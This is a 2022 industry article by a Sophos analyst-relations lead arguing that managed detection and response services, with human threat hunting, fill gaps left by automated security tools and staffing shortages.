September 30, 2022
How Managed Detection and Response Services Bolster Cyber Defenses
A partner with advanced threat-hunting capabilities can augment internal tools and teams.
Managed detection and response (MDR) is one of the fastest-growing areas in cybersecurity. Gartner projects that by 2025, 50 percent of organizations will have adopted an MDR service. Today, however, many organizations are still trying to figure out how MDR fits into their existing tools and capabilities.
MDR combines human expertise and sophisticated technologies to deliver 24/7 monitoring: looking for threats, conducting investigations and responding to suspicious activity. Unlike incident response services, MDR is proactive. The goal is to prevent a breach from occurring in the first place. The best MDR providers use an extended detection and response solution that provides visibility into all the areas where users and data may exist — a necessary capability given the nature of work today.
Let’s look at a few scenarios where MDR could benefit an organization.
As Hackers Evolve Their Tactics, Security Tools Alone Aren’t Enough
It’s tempting to believe your defenses are secure if you deploy an arsenal of advanced security solutions. Unfortunately, many organizations don’t fully appreciate that security tools alone aren’t always enough.
At this point, most endpoint protection tools generally are effective at detecting known threats. When they encounter a situation they’ve seen before, they can take action against it without human intervention. In other cases, tools can detect a threat and block the initial instance, but they still need someone to investigate to ensure the rest of the environment remains secure.
The problem is that attackers know how security tools function, and they know how evade detection. Increasingly, adversaries are launching “living off the land” attacks in which they take advantage of legitimate tools to exploit vulnerabilities.
One of the most common techniques is the malicious use of PowerShell. No matter how good security tools are, they can’t distinguish between malicious and legitimate uses of PowerShell. The best they can do is to flag activity that might indicate an attacker, prompting a human to investigate the potential threat and determine what action is needed.
Another common scenario is that an attacker does something new in the environment that the security tool hasn’t encountered before. Once again, the tool can’t take action, so human intervention is needed.
MDR services address these vulnerabilities through an ongoing process of threat hunting. A security analyst who knows how to think like an attacker continually looks for threats that have evaded detection by security tools. When a tool encounters a new attack type or new suspicious behavior, the analyst is the last line of defense.
Organizations Struggle to Acquire True Threat-Hunting Expertise
The increasing sophistication of hackers isn’t the only reason to adopt MDR. Another common motivation is the need to address a talent gap. Many organizations find it difficult to hire cybersecurity professionals who can use security tools effectively. Even organizations that manage to hire security professionals find that they may not have all the specialized capabilities needed to engage in threat hunting. In addition, as attackers have become more sophisticated, so have security tools — which means there are even fewer people equipped to use them effectively.
Some organizations adopt MDR in the wake of a breach. They’ve experienced it once and want to ensure it does not happen again. Organizations undergoing fast growth may invest in MDR proactively. They know that as they grow, they’ll collect and produce more data, and they want to minimize the security vulnerabilities associated with data sprawl.
The bottom line, for many organizations, boils down to which threats are the most significant for their environments, which tools they need to optimize their visibility and where capability gaps prevent them from deriving full value from those tools. MDR is proving to be an essential defense for organizations that want to stay one step ahead of attackers.
Story by Eric Kokonas, the global head of analyst relations at Sophos.